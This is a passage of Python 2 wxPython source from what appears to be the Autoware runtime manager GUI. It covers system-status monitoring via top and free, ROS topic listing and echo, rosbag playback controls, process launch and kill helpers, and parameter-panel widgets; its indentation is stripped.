self.OnLaunchKill_obj(cam_id_obj)
#
# Simulation Tab
#
def rosbag_info_hook(self, v):
if not v:
return
err = subprocess.STDOUT
s = subprocess.check_output([ 'rosbag', 'info', v ], stderr=err).strip()
self.label_rosbag_info.SetLabel(s)
self.label_rosbag_info.GetParent().FitInside()
#
# Data Tab
#
#
	# Status tab
#
def info_col(self, v, v_yellow, v_red, col_normal, col_red):
if v < v_yellow:
return col_normal
if v < v_red:
(nr,ng,nb) = col_normal
(rr,rg,rb) = col_red
return ( (nr+rr)/2, (ng+rg)/2, (nb+rb)/2 )
return col_red
def mem_kb_info(self):
lst = subprocess.check_output(['free']).strip().split('\n')[2].split()[2:4]
used = int(lst[0])
free = int(lst[1])
return (used + free, used)
def toprc_create(self):
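		# Run an interactive 'top' on a pseudo-terminal and send it keystrokes
		# ('1' per-CPU view, 'c' full command line, 'W' write ~/.toprc, 'q' quit)
		# so that later batch invocations of top use this layout.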
(child_pid, fd) = pty.fork()
if child_pid == 0: # child
os.execvp('top', ['top'])
else: #parent
sec = 0.2
for s in ['1', 'c', 'W', 'q']:
time.sleep(sec)
os.write(fd, s)
def toprc_setup(self, toprc, backup):
if os.path.exists(toprc):
os.rename(toprc, backup)
self.toprc_create()
def toprc_restore(self, toprc, backup):
os.remove(toprc)
if os.path.exists(backup):
os.rename(backup, toprc)
# top command thread
def top_cmd_th(self, ev, setting, cpu_ibls, mem_ibl, toprc, backup):
interval = setting.get('interval', 3)
alert_level = setting.get('alert_level', {})
rate_per_cpu = alert_level.get('rate_per_cpu', 80)
rate_per_cpu_yellow = alert_level.get('rate_per_cpu_yellow', 80)
rate_cpu = alert_level.get('rate_cpu', 80)
rate_mem = alert_level.get('rate_mem', 80)
rate_mem_yellow = alert_level.get('rate_mem_yellow', 80)
for ibl in cpu_ibls:
ibl.lmt_bar_prg = rate_per_cpu
mem_ibl.lmt_bar_prg = rate_mem
alerted = False
cpu_n = psutil.NUM_CPUS
while not ev.wait(interval):
s = subprocess.check_output(['sh', '-c', 'env COLUMNS=512 top -b -n 2 -d 0.1']).strip()
i = s.rfind('\ntop -') + 1
s = s[i:]
wx.CallAfter(self.label_top_cmd.SetLabel, s)
wx.CallAfter(self.label_top_cmd.GetParent().FitInside)
k = '%Cpu'
fv_sum = 0
i = 0
for t in s.split('\n'):
if t[:len(k)] != k:
continue
lst = t[1:].split()
v = lst[1] if lst[1] != ':' else lst[2]
if v[0] == ':':
v = v[1:]
fv = str_to_float(v)
col = self.info_col(fv, rate_per_cpu_yellow, rate_per_cpu, (64,64,64), (200,0,0))
if i < cpu_n:
ibl = cpu_ibls[i]
wx.CallAfter(ibl.lb_set, v+'%', col)
wx.CallAfter(ibl.bar_set, int(fv))
fv_sum += fv
i += 1
k = 'KiB Mem:'
(total, used) = self.mem_kb_info()
rate = 100 * used / total
for u in [ 'KB', 'MB', 'GB', 'TB' ]:
if total <= 10 * 1024 or used <= 10:
break
total /= 1024
used /= 1024
col = self.info_col(rate, rate_mem_yellow, rate_mem, (64,64,64), (200,0,0))
tx = str(used) + u + '/' + str(total) + u + '(' + str(rate) + '%)'
wx.CallAfter(mem_ibl.lb_set, tx, col)
wx.CallAfter(mem_ibl.bar_set, rate)
is_alert = (fv_sum >= rate_cpu * cpu_n) or rate >= rate_mem
# --> for test
if os.path.exists('/tmp/alert_test_on'):
is_alert = True
if os.path.exists('/tmp/alert_test_off'):
is_alert = False
# <-- for test
if is_alert and not alerted:
thinf = th_start(self.alert_th, {'bgcol':(200,50,50)})
alerted = True
if not is_alert and alerted:
th_end(thinf)
alerted = False
# top5
i = s.find('\n\n') + 2
lst = s[i:].split('\n')
hd = lst[0]
top5 = lst[1:1+5]
i = hd.rfind('COMMAND')
cmds = [ line[i:].split(' ')[0] for line in top5 ]
i = hd.find('%CPU')
loads = [ line[i-1:].strip().split(' ')[0] for line in top5 ]
for (lb, cmd, load) in zip(self.lb_top5, cmds, loads):
col = self.info_col(str_to_float(load), rate_per_cpu_yellow, rate_per_cpu, (64,64,64), (200,0,0))
wx.CallAfter(lb.SetForegroundColour, col)
wx.CallAfter(lb.SetLabel, cmd + ' (' + load + ' %CPU)')
self.toprc_restore(toprc, backup)
def alert_th(self, bgcol, ev):
wx.CallAfter(self.RequestUserAttention)
c = bgcol
o = wx.NullColour
while not ev.wait(0.5):
for col in [ c, o, c, o, c, o ]:
wx.CallAfter(self.set_bg_all_tabs, col)
time.sleep(0.05)
def log_th(self, file, que, ev):
while not ev.wait(0):
s = file.readline()
if not s:
break
que.put(s)
def logout_th(self, que, interval, tc, ev):
if que == self.log_que_stdout or que == self.log_que_stderr:
while not ev.wait(0):
try:
s = que.get(timeout=1)
except Queue.Empty:
continue
self.log_que.put(s)
if interval <= 0:
continue
ckbox = self.checkbox_stdout if que == self.log_que_stdout else self.checkbox_stderr
if ckbox.GetValue():
self.log_que_show.put( cut_esc(s) )
else: # == self.log_que
f = None
path = self.status_dic.get('log_path')
is_syslog = (path == 'syslog')
if is_syslog:
ident = sys.argv[0].split('/')[-1]
syslog.openlog(ident, syslog.LOG_PID | syslog.LOG_CONS)
elif path:
path = os.path.expandvars(os.path.expanduser(path))
f = open(path, 'a') if path else None
while not ev.wait(0):
try:
s = que.get(timeout=1)
except Queue.Empty:
continue
print s.strip()
sys.stdout.flush()
s = cut_esc(s)
if is_syslog:
syslog.syslog(s)
elif f:
f.write(s)
f.flush()
if is_syslog:
syslog.closelog()
if f:
f.close()
def logshow_th(self, que, interval, tc, ev):
while not ev.wait(interval):
try:
s = que.get(timeout=1)
except Queue.Empty:
continue
wx.CallAfter(append_tc_limit, tc, s)
# que clear
if self.checkbox_stdout.GetValue() is False and \
self.checkbox_stderr.GetValue() is False and \
que.qsize() > 0:
que_clear(que)
wx.CallAfter(tc.Clear)
#
# for Topics tab
#
def OnRefreshTopics(self, event):
self.refresh_topics_list()
def refresh_topics_list(self):
lst = subprocess.check_output([ 'rostopic', 'list' ]).strip().split('\n')
panel = self.panel_topics_list
szr = self.sizer_topics_list
for obj in self.topics_list:
szr.Remove(obj)
obj.Destroy()
self.topics_list = []
for topic in lst:
obj = wx.HyperlinkCtrl(panel, wx.ID_ANY, topic, '')
self.Bind(wx.EVT_HYPERLINK, self.OnTopicLink, obj)
szr.Add(obj, 0, wx.LEFT, 4)
fix_link_color(obj)
self.topics_list.append(obj)
szr.Layout()
panel.SetVirtualSize(szr.GetMinSize())
# info clear
lb = self.label_topics_info
lb.SetLabel('')
# echo clear
self.topics_proc_th_end()
# wait que clear
while self.topics_echo_que.qsize() > 0:
time.sleep(0.1)
tc = self.text_ctrl_topics_echo
tc.Enable(False)
wx.CallAfter(tc.Clear)
wx.CallAfter(tc.Enable, True)
self.topics_echo_sum = 0
self.topic_echo_curr_topic = None
def OnEcho(self, event):
if self.checkbox_topics_echo.GetValue() and self.topic_echo_curr_topic:
self.topics_proc_th_start(self.topic_echo_curr_topic)
else:
self.topics_proc_th_end()
def OnTopicLink(self, event):
obj = event.GetEventObject()
topic = obj.GetLabel()
self.topic_echo_curr_topic = topic
# info
info = subprocess.check_output([ 'rostopic', 'info', topic ]).strip()
lb = self.label_topics_info
lb.SetLabel(info)
lb.GetParent().FitInside()
# echo
self.topics_proc_th_end()
if self.checkbox_topics_echo.GetValue():
self.topics_proc_th_start(topic)
def topics_proc_th_start(self, topic):
out = subprocess.PIPE
err = subprocess.STDOUT
self.topics_echo_proc = psutil.Popen([ 'rostopic', 'echo', topic ], stdout=out, stderr=err)
self.topics_echo_thinf = th_start(self.topics_echo_th)
def topics_proc_th_end(self):
thinf = self.topics_echo_thinf
if thinf:
th_end(thinf)
self.topics_echo_thinf = None
proc = self.topics_echo_proc
if proc:
terminate_children(proc)
terminate(proc)
#proc.wait()
self.topics_echo_proc = None
def topics_echo_th(self, ev):
if not self.topics_echo_proc:
return
file = self.topics_echo_proc.stdout
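		# Switch the child's stdout pipe to non-blocking reads so this loop can
		# keep checking the stop event instead of hanging on read().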
fl = fcntl.fcntl(file.fileno(), fcntl.F_GETFL)
fcntl.fcntl(file.fileno(), fcntl.F_SETFL, fl | os.O_NONBLOCK)
while not ev.wait(0):
try:
s = file.read(1)
except:
continue
if not s:
break
if self.checkbox_topics_echo.GetValue():
self.topics_echo_que.put(s)
que_clear(self.topics_echo_que)
def topics_echo_show_th(self, ev):
que = self.topics_echo_que
interval = self.topics_dic.get('gui_update_interval_ms', 100) * 0.001
chars_limit = self.topics_dic.get('gui_chars_limit', 10000)
tc = self.text_ctrl_topics_echo
while not ev.wait(interval):
qsz = que.qsize()
if qsz <= 0:
continue
if qsz > chars_limit:
over = qsz - chars_limit
for i in range(over):
try:
que.get(timeout=1)
except Queue.Empty:
break
qsz = chars_limit
arr = []
for i in range(qsz):
try:
s = que.get(timeout=1)
except Queue.Empty:
s = ''
arr.append(s)
s = ''.join(arr)
self.topics_echo_sum += len(s)
rm_chars = 0
if self.topics_echo_sum > chars_limit:
rm_chars = self.topics_echo_sum - chars_limit
self.topics_echo_sum = chars_limit
if self.checkbox_topics_echo.GetValue():
wx.CallAfter(append_tc_limit, tc, s, rm_chars)
#
# Common Utils
#
def set_param_panel(self, obj, parent):
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
panel = ParamPanel(parent, frame=self, pdic=pdic, gdic=gdic, prm=prm)
sizer_wrap((panel,), wx.VERTICAL, 0, wx.EXPAND, 0, parent)
k = 'ext_toggle_enables'
gdic[ k ] = gdic.get(k, []) + [ panel ]
def obj_to_varpanel(self, obj, var_name):
gdic = self.obj_to_gdic(obj, {})
return gdic.get(var_name, {}).get('var')
def obj_to_varpanel_tc(self, obj, var_name):
vp = self.obj_to_varpanel(obj, var_name)
return vp.tc if vp and vp.tc else None
def OnConfig(self, event):
self.OnHyperlinked_obj(event.GetEventObject())
def add_params(self, params):
for prm in params:
if 'topic' in prm and 'msg' in prm:
klass_msg = globals()[ prm['msg'] ]
prm['pub'] = rospy.Publisher(prm['topic'], klass_msg, latch=True, queue_size=10)
self.params += params
def gdic_get_1st(self, dic):
gdic = dic.get('gui', {})
gdic['update_func'] = self.update_func
return gdic
def add_cfg_info(self, cfg_obj, obj, name, pdic, gdic, run_disable, prm):
self.config_dic[ cfg_obj ] = { 'obj':obj , 'name':name , 'pdic':pdic , 'gdic':gdic,
'run_disable':run_disable , 'param':prm }
def get_param(self, prm_name):
return next( (prm for prm in self.params if prm['name'] == prm_name), None)
def get_var(self, prm, var_name, def_ret=None):
return next( (var for var in prm.get('vars') if var.get('name') == var_name), def_ret)
def obj_to_cmd_dic(self, obj):
return next( (cmd_dic for cmd_dic in self.all_cmd_dics if obj in cmd_dic), None)
def obj_to_cmd_dic_cmd_proc(self, obj):
cmd_dic = self.obj_to_cmd_dic(obj)
if cmd_dic is None:
return (None, None, None)
(cmd, proc) = cmd_dic.get(obj, (None, None))
return (cmd_dic, cmd, proc)
def OnLaunchKill(self, event):
self.OnLaunchKill_obj(event.GetEventObject())
def OnLaunchKill_obj(self, obj):
self.alias_sync(obj)
obj = self.alias_grp_top_obj(obj)
v = obj.GetValue()
add_args = self.obj_to_add_args(obj, msg_box=v) # no open dialog at kill
if add_args is False:
set_val(obj, not v)
return
(cmd_dic, _, proc_bak) = self.obj_to_cmd_dic_cmd_proc(obj)
self.launch_kill_proc(obj, cmd_dic, add_args=add_args)
(_, _, proc) = self.obj_to_cmd_dic_cmd_proc(obj)
if proc != proc_bak:
self.toggle_enable_obj(obj)
if proc:
self.update_proc_cpu(obj)
def OnRosbagPlay(self, event):
obj = event.GetEventObject()
play = self.button_play_rosbag_play
stop = self.button_stop_rosbag_play
pause = self.button_pause_rosbag_play
(_, _, prm) = self.obj_to_pdic_gdic_prm(play)
var = self.get_var(prm, 'sim_time', {})
if obj == play:
var['v'] = True
self.OnLaunchKill_obj(play)
button_color_change(play)
set_val(stop, False)
set_val(pause, False)
elif obj == stop:
set_val(stop, True)
set_val(play, False)
set_val(pause, False)
var['v'] = False
self.OnLaunchKill_obj(play)
button_color_change(stop)
elif obj == pause:
(_, _, proc) = self.obj_to_cmd_dic_cmd_proc(play)
if proc:
proc.stdin.write(' ')
def OnFtrace(self, event):
obj = event.GetEventObject()
cmd = 'rosrun runtime_manager ftrace.py'
v = obj.GetValue()
self.ftrace_proc_ = self.launch_kill(v, cmd,
None if v else self.ftrace_proc_, obj=obj)
def stdout_file_search(self, file, k):
s = ''
while True:
c = file.read(1)
if not c:
return None
if c != '\r' and c != '\n':
s += c
continue
s = s.strip()
if k in s:
break
s = ''
i = s.find(k) + len(k)
return s[i:]
# thread
def point_cloud_progress_bar(self, file, ev):
obj = self.button_point_cloud
(pdic, _, _) = self.obj_to_pdic_gdic_prm(obj)
n = len(pdic.get('path_pcd', '').split(','))
if n == 0:
return
i = 0
while not ev.wait(0):
s = self.stdout_file_search(file, 'load ')
if not s:
break
err_key = 'failed '
if s[:len(err_key)] != err_key:
i += 1
else:
i -= 1
print s
wx.CallAfter(self.label_point_cloud_bar.set, 100 * i / n)
wx.CallAfter(self.label_point_cloud_bar.clear)
# thread
def rosbag_play_progress_bar(self, file, ev):
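		# Scan rosbag play's stdout for 'Duration: <pos> / <total>' and update
		# the progress bar and position/total labels accordingly.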
while not ev.wait(0):
s = self.stdout_file_search(file, 'Duration:')
if not s:
break
lst = s.split()
pos = str_to_float(lst[0])
# lst[1] is '/'
total = str_to_float(lst[2])
if total == 0:
continue
prg = int(100 * pos / total + 0.5)
pos = str(int(pos))
total = str(int(total))
wx.CallAfter(self.label_rosbag_play_bar.set, prg)
wx.CallAfter(self.label_rosbag_play_pos.SetLabel, pos)
wx.CallAfter(self.label_rosbag_play_total.SetLabel, total)
wx.CallAfter(self.label_rosbag_play_bar.clear)
wx.CallAfter(self.label_rosbag_play_pos.SetLabel, '')
wx.CallAfter(self.label_rosbag_play_total.SetLabel, '')
def alias_sync(self, obj, v=None):
en = None
if getattr(obj, 'IsEnabled', None):
(key, en) = enables_get_last(obj)
if not key:
en = obj.IsEnabled()
grp = self.alias_grp_get(obj)
if getattr(obj, 'GetValue', None):
v = obj.GetValue()
for o in grp:
if o is obj:
continue
if en is not None and o.IsEnabled() != en and not self.is_toggle_button(o):
if key:
enable_set(o, key, en)
else:
o.Enable(en)
if v is not None and getattr(o, 'SetValue', None):
set_val(o, v)
if getattr(o, 'SetInsertionPointEnd', None):
o.SetInsertionPointEnd()
def alias_grp_top_obj(self, obj):
return get_top(self.alias_grp_get(obj), obj)
def alias_grp_get(self, obj):
return next( (grp for grp in self.alias_grps if obj in grp), [])
def create_tree(self, parent, items, tree, item, cmd_dic):
name = items.get('name', '')
if tree is None:
style = wx.TR_HAS_BUTTONS | wx.TR_NO_LINES | wx.TR_HIDE_ROOT | wx.TR_DEFAULT_STYLE | wx.SUNKEN_BORDER
tree = CT.CustomTreeCtrl(parent, wx.ID_ANY, agwStyle=style)
item = tree.AddRoot(name, data=tree)
tree.Bind(wx.EVT_MOTION, self.OnTreeMotion)
else:
ct_type = 1 if 'cmd' in items else 0 # 1:checkbox type
item = tree.AppendItem(item, name, ct_type=ct_type)
if 'desc' in items:
item.SetData(items.get('desc'))
if 'cmd' in items:
cmd_dic[item] = (items['cmd'], None)
pdic = self.load_dic_pdic_setup(name, items)
pnl = wx.Panel(tree, wx.ID_ANY)
add_objs = []
self.new_link(item, name, pdic, self.sys_gdic, pnl, 'sys', 'sys', add_objs)
gdic = self.gdic_get_1st(items)
if 'param' in items:
self.new_link(item, name, pdic, gdic, pnl, 'app', items.get('param'), add_objs)
else:
self.add_cfg_info(item, item, name, None, gdic, False, None)
szr = sizer_wrap(add_objs, wx.HORIZONTAL, parent=pnl)
szr.Fit(pnl)
tree.SetItemWindow(item, pnl)
for sub in items.get('subs', []):
self.create_tree(parent, sub, tree, item, cmd_dic)
return tree
def new_link(self, item, name, pdic, gdic, pnl, link_str, prm_name, add_objs):
lkc = None
if 'no_link' not in gdic.get('flags', []):
lkc = wx.HyperlinkCtrl(pnl, wx.ID_ANY, link_str, "")
fix_link_color(lkc)
self.Bind(wx.EVT_HYPERLINK, self.OnHyperlinked, lkc)
if len(add_objs) > 0:
add_objs += [ wx.StaticText(pnl, wx.ID_ANY, ' ') ]
add_objs += [ wx.StaticText(pnl, wx.ID_ANY, '['), lkc, wx.StaticText(pnl, wx.ID_ANY, ']') ]
prm = self.get_param(prm_name)
self.add_cfg_info(lkc if lkc else item, item, name, pdic, gdic, False, prm)
def load_dic_pdic_setup(self, name, dic):
name = dic.get('share_val', dic.get('name', name))
pdic = self.load_dic.get(name, {})
self.load_dic[ name ] = pdic
return pdic
def launch_kill_proc(self, obj, cmd_dic, add_args=None):
if obj not in cmd_dic:
set_val(obj, False)
print('not implemented.')
return
v = obj.GetValue()
(cmd, proc) = cmd_dic[obj]
if not cmd:
set_val(obj, False)
proc = self.launch_kill(v, cmd, proc, add_args, obj=obj)
(cfg_obj, dic) = self.cfg_obj_dic( {'obj':obj} )
if cfg_obj and dic.get('run_disable'):
cfg_obj.Enable(not v)
cmd_dic[obj] = (cmd, proc)
if not v:
self.stat_label_off(obj)
def proc_to_cmd_dic_obj(self, proc):
for cmd_dic in self.all_cmd_dics:
obj = next( (obj for (obj, v) in cmd_dic.items() if proc in v), None)
if obj:
return (cmd_dic, obj)
return (None, None)
def launch_kill(self, v, cmd, proc, add_args=None, sigint=None, obj=None, kill_children=None):
msg = None
msg = 'already launched.' if v and proc else msg
msg = 'already terminated.' if not v and proc is None else msg
msg = 'cmd not implemented.' if not cmd else msg
if msg is not None:
print(msg)
return proc
if v:
args = shlex.split(cmd)
if add_args:
args += add_args
print(args) # for debug
f = self.obj_to_gdic(obj, {}).get('stdout_func')
f = eval_if_str(self, f)
f = f if f else self.log_th
out = subprocess.PIPE if f else None
err = subprocess.STDOUT if f else None
if f == self.log_th:
err = subprocess.PIPE
proc = psutil.Popen(args, stdin=subprocess.PIPE, stdout=out, stderr=err)
self.all_procs.append(proc)
if f == self.log_th:
thinf = th_start(f, {'file':proc.stdout, 'que':self.log_que_stdout})
self.all_th_infs.append(thinf)
thinf = th_start(f, {'file':proc.stderr, 'que':self.log_que_stderr})
self.all_th_infs.append(thinf)
elif f:
thinf = th_start(f, {'file':proc.stdout})
self.all_th_infs.append(thinf)
else:
flags = self.obj_to_gdic(obj, {}).get('flags', [])
if sigint is None:
sigint = 'SIGTERM' not in flags
if kill_children is None:
kill_children = 'kill_children' in flags
if kill_children:
terminate_children(proc, sigint)
terminate(proc, sigint)
proc.wait()
if proc in self.all_procs:
self.all_procs.remove(proc)
proc = None
return proc
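# launch_kill() is the central launch/terminate helper: with v=True it splits
# cmd with shlex, appends add_args, starts the process via psutil.Popen and wires
# stdout/stderr either to the widget's 'stdout_func' from its gdic or to the
# default log threads; with v=False it terminates the process (SIGINT unless the
# gdic flags request SIGTERM, optionally killing child processes) and drops it
# from all_procs. A hypothetical call sequence, assuming obj is a toggle button:
#   proc = self.launch_kill(True, 'rosbag play demo.bag', None, obj=obj)
#   ...
#   proc = self.launch_kill(False, 'rosbag play demo.bag', proc, obj=obj)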
def roslaunch_to_nodes(self, cmd):
try:
s = subprocess.check_output(cmd).strip()
return s.split('\n') if s != '' else []
except subprocess.CalledProcessError:
return []
def set_bg_all_tabs(self, col=wx.NullColour):
add_pnls = [
self,
self.tree_ctrl_0,
self.tree_ctrl_1,
self.tree_ctrl_data ]
for tab in self.all_tabs + add_pnls:
tab.SetBackgroundColour(col)
def get_autoware_dir(self):
dir = rtmgr_src_dir() + '../../../../../../'
return os.path.abspath(dir)
def load_yaml(self, filename, def_ret=None):
return load_yaml(filename, def_ret)
def toggle_enable_obj(self, obj):
objs = []
pfs = [ 'button_play_', 'button_stop_', 'button_pause_',
'button_ref_', 'text_ctrl_' ]
key = self.obj_key_get(obj, pfs)
if key:
objs += self.key_objs_get(pfs, key)
gdic = self.obj_to_gdic(obj, {})
objs += [ eval_if_str(self, e) for e in gdic.get('ext_toggle_enables', []) ]
self.toggle_enables(objs)
def toggle_enables(self, objs):
for obj in objs:
if getattr(obj, 'IsEnabled', None):
en = enables_get(obj, 'toggle', obj.IsEnabled())
enables_set(obj, 'toggle', not en)
self.alias_sync(obj)
def is_toggle_button(self, obj):
return self.name_get(obj).split('_')[0] == 'button' and getattr(obj, 'GetValue', None)
def obj_name_split(self, obj, pfs):
name = self.name_get(obj)
if name is None:
return (None, None)
return next( ( ( name[:len(pf)], name[len(pf):] ) for pf in pfs if name[:len(pf)] == pf ), None)
def obj_key_get(self, obj, pfs):
name = self.name_get(obj)
if name is None:
return None
return next( (name[len(pf):] for pf in pfs if name[:len(pf)] == pf), None)
def key_objs_get(self, pfs, key):
return [ self.obj_get(pf + key) for pf in pfs if self.obj_get(pf + key) ]
def name_get(self, obj):
return next( (nm for nm in dir(self) if getattr(self, nm) is obj), None)
def name_get_cond(self, obj, cond=(lambda s : True), def_ret=None):
return next( (nm for nm in dir(self) if cond(nm) and getattr(self, nm) is obj), def_ret)
def val_get(self, name):
obj = self.obj_get(name)
if obj is None:
return None
return obj.GetValue() if getattr(obj, 'GetValue', None) else None
def obj_get(self, name):
return getattr(self, name, None)
def gdic_dialog_type_chk(gdic, name):
dlg_type = dic_list_get(gdic, 'dialog_type', 'config')
tail = '_dialog_only'
lst = [ (k, k[:-len(tail)]) for k in gdic.keys() if k[-len(tail):] == tail ]
only_chk = next( (False for (k,type) in lst if type != dlg_type and name in gdic.get(k, [])), True)
tail = '_dialog_allow'
lst = [ (k, k[:-len(tail)]) for k in gdic.keys() if k[-len(tail):] == tail ]
allow_chk = next( (False for (k,type) in lst if type == dlg_type and name not in gdic.get(k, [])), True)
return only_chk and allow_chk
def gdic_dialog_name_get(gdic):
dlg_type = dic_list_get(gdic, 'dialog_type', 'config')
return gdic.get(dlg_type + '_dialog', gdic.get('dialog', 'MyDialogParam') )
class ParamPanel(wx.Panel):
def __init__(self, *args, **kwds):
self.frame = kwds.pop('frame')
self.pdic = kwds.pop('pdic')
self.gdic = kwds.pop('gdic')
self.prm = kwds.pop('prm')
wx.Panel.__init__(self, *args, **kwds)
self.gdic['param_panel'] = self
obj = self.frame.cfg_prm_to_obj( {'pdic':self.pdic, 'gdic':self.gdic, 'param':self.prm} )
(_, _, proc) = self.frame.obj_to_cmd_dic_cmd_proc(obj)
hszr = None
self.vps = []
self.tmp_msg = None
szr = wx.BoxSizer(wx.VERTICAL)
topic_szrs = (None, None)
vars = self.prm.get('vars')
if self.gdic.get('show_order'):
var_lst = lambda name, vars : [ var for var in vars if var.get('name') == name ]
vars = reduce( lambda lst, name : lst + var_lst(name, vars), self.gdic.get('show_order'), [] )
for var in vars:
name = var.get('name')
if not gdic_dialog_type_chk(self.gdic, name):
continue
gdic_v = self.get_gdic_v_and_chk_enable(name)
if gdic_v is None:
continue
bak_stk_push(gdic_v, 'func')
if gdic_v.get('func'):
continue
v = self.pdic.get(name, var.get('v'))
vp = VarPanel(self, var=var, v=v, update=self.update)
vp.setup_tooltip()
self.vps.append(vp)
gdic_v['var'] = vp
gdic_v['func'] = vp.get_v
prop = gdic_v.get('prop', 0)
border = gdic_v.get('border', 0)
flag = wx_flag_get(gdic_v.get('flags', []))
do_category = 'no_category' not in gdic_v.get('flags', [])
if do_category and self.in_msg(var):
bak = (szr, hszr)
(szr, hszr) = topic_szrs
if szr is None:
szr = static_box_sizer(self, 'topic : ' + self.prm.get('topic'))
bak[0].Add(szr, 0, wx.EXPAND | wx.ALL, 4)
targ_szr = szr
if vp.is_nl():
hszr = None
flag |= wx.EXPAND
else:
if hszr is None:
hszr = wx.BoxSizer(wx.HORIZONTAL)
szr.Add(hszr, 0, wx.EXPAND)
flag |= wx.ALIGN_CENTER_VERTICAL
targ_szr = hszr
if do_category and 'rosparam' in var:
rp_szr = static_box_sizer(self, 'rosparam : ' + var.get('rosparam'))
targ_szr.Add(rp_szr, 0, wx.EXPAND | wx.ALL, 4)
targ_szr = rp_szr
user_category = gdic_v.get('user_category')
if user_category is not None and hszr:
user_szr = static_box_sizer(self, user_category, orient=wx.HORIZONTAL)
(flgs, bdr) = gdic_v.get('user_category_add', [ [], 0 ])
targ_szr.Add(user_szr, 0, wx_flag_get(flgs), bdr)
targ_szr = hszr = user_szr
targ_szr.Add(vp, prop, flag, border)
if 'nl' in gdic_v.get('flags', []):
hszr = None
if do_category and self.in_msg(var):
topic_szrs = (szr, hszr)
(szr, hszr) = bak
if 'hline' in gdic_v.get('flags', []) and hszr is None:
szr.Add(wx.StaticLine(self, wx.ID_ANY), 0, wx.EXPAND | wx.TOP | wx.BOTTOM, 4)
if not self.in_msg(var) and var.get('rosparam'):
k = 'ext_toggle_enables'
self.gdic[ k ] = self.gdic.get(k, []) + [ vp ]
enables_set(vp, 'toggle', proc is None)
if 'disable' in gdic_v.get('flags', []):
vp.Enable(False)
if 'hide' in gdic_v.get('flags', []):
vp.Hide()
self.SetSizer(szr)
if 'no_init_update' not in self.prm.get('flags', []):
self.update()
def get_gdic_v_and_chk_enable(self, var_name):
gdic_v = dic_getset(self.gdic, var_name, {})
if 'panel' in gdic_v and dic_eval_if_str(self.frame, gdic_v, 'panel') != self.GetParent():
return None
return gdic_v
def update(self, var=None):
update_func = self.gdic.get('update_func')
if update_func:
self.gdic['update_func_arg_var'] = var
update_func(self.pdic, self.gdic, self.prm)
def detach_func(self):
for var in self.prm.get('vars'):
name = var.get('name')
if not gdic_dialog_type_chk(self.gdic, name):
continue
gdic_v = self.get_gdic_v_and_chk_enable(name)
if gdic_v is None:
continue
if 'func' in gdic_v:
bak_stk_pop(gdic_v, 'func')
vp = gdic_v.get('var')
lst_remove_once(self.gdic.get('ext_toggle_enables', []), vp)
def in_msg(self, var):
if 'topic' not in self.prm or 'msg' not in self.prm:
return False
if self.tmp_msg is None:
klass_msg = globals().get( self.prm.get('msg') )
if klass_msg is None:
return False
self.tmp_msg = klass_msg()
(obj, attr) = msg_path_to_obj_attr(self.tmp_msg, var.get('name'))
return obj and attr in obj.__slots__
class VarPanel(wx.Panel):
def __init__(self, *args, **kwds):
self.var = kwds.pop('var')
v = kwds.pop('v')
self.update = kwds.pop('update')
wx.Panel.__init__(self, *args, **kwds)
self.min = self.var.get('min')
self.max = self.var.get('max')
self.has_slider = self.min is not None and self.max is not None
self.lb = None
label = self.var.get('label', '')
self.kind = self.var.get('kind')
if self.kind == 'radio_box':
choices = self.var.get('choices', [])
style = wx.RA_SPECIFY_COLS if self.var.get('choices_style') == 'h' else wx.RA_SPECIFY_ROWS
self.obj = wx.RadioBox(self, wx.ID_ANY, label, choices=choices, majorDimension=0, style=style)
self.choices_sel_set(v)
self.Bind(wx.EVT_RADIOBOX, self.OnUpdate, self.obj)
return
if self.kind == 'menu':
choices = self.var.get('choices', [])
self.obj = wx.Choice(self, wx.ID_ANY, choices=choices)
self.choices_sel_set(v)
self.Bind(wx.EVT_CHOICE, self.OnUpdate, self.obj)
if label:
self.lb = wx.StaticText(self, wx.ID_ANY, label)
flag = wx.LEFT | wx.ALIGN_CENTER_VERTICAL
sizer_wrap((self.lb, self.obj), wx.HORIZONTAL, 0, flag, 4, self)
return
if self.kind == 'checkbox':
self.obj = wx.CheckBox(self, wx.ID_ANY, label)
self.obj.SetValue(v)
self.Bind(wx.EVT_CHECKBOX, self.OnUpdate, self.obj)
return
if self.kind == 'checkboxes':
item_n = dic_eval_if_str(self, self.var, 'item_n', 1)
self.obj = Checkboxes(self, item_n, label)
self.obj.set(v)
for box in self.obj.boxes:
self.obj.Bind(wx.EVT_CHECKBOX, self.OnUpdate, box)
return
if self.kind == 'toggle_button':
self.obj = wx.ToggleButton(self, wx.ID_ANY, label)
set_val(self.obj, v)
self.Bind(wx.EVT_TOGGLEBUTTON, self.OnUpdate, self.obj)
button_color_hdr_setup(self.obj)
return
if self.kind == 'hide':
self.Hide()
return
szr = wx.BoxSizer(wx.HORIZONTAL)
self.lb = wx.StaticText(self, wx.ID_ANY, label)
flag = wx.LEFT | wx.ALIGN_CENTER_VERTICAL
szr.Add(self.lb, 0, flag, 4)
if self.kind == 'path':
v = str(v)
v = path_expand_cmd(v)
v = os.path.expandvars(os.path.expanduser(v))
style = wx.TE_PROCESS_ENTER + wx_flag_get( self.var.get('str_flags', []) )
self.tc = wx.TextCtrl(self, wx.ID_ANY, str(v), style=style)
self.Bind(wx.EVT_TEXT_ENTER, self.OnUpdate, self.tc)
if self.kind in ('num', None):
if self.has_slider:
self.w = self.max - self.min
vlst = [ v, self.min, self.max, self.var['v'] ]
self.is_float = len( [ v_ for v_ in vlst if type(v_) is not int ] ) > 0
self.int_max = 1000 if self.is_float else self.max
self.int_min = 0 if self.is_float else self.min
self.slider = wx.Slider(self, wx.ID_ANY, self.get_int_v(), self.int_min, self.int_max)
self.Bind(wx.EVT_COMMAND_SCROLL, self.OnScroll, self.slider)
self.slider.SetMinSize((82, 27))
szr.Add(self.slider, 1, wx.LEFT | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL, 4)
else:
self.is_float = type(self.var['v']) is not int
self.tc.SetMinSize((40,27))
flag = wx.ALIGN_CENTER_VERTICAL
prop = 1 if self.kind == 'path' or self.kind == 'str' else 0
szr.Add(self.tc, prop, flag, 4)
if self.kind == 'path':
self.ref = wx.Button(self, wx.ID_ANY, 'Ref')
self.Bind(wx.EVT_BUTTON, self.OnRef, self.ref)
button_color_hdr_setup(self.ref)
self.ref.SetMinSize((40,29))
szr.Add(self.ref, 0, flag, 4)
if self.has_slider or self.kind == 'num':
vszr = wx.BoxSizer(wx.VERTICAL)
vszr.Add( self.create_bmbtn("inc.png", self.OnIncBtn) )
vszr.Add( self.create_bmbtn("dec.png", self.OnDecBtn) )
szr.Add(vszr, 0, wx.ALIGN_CENTER_VERTICAL)
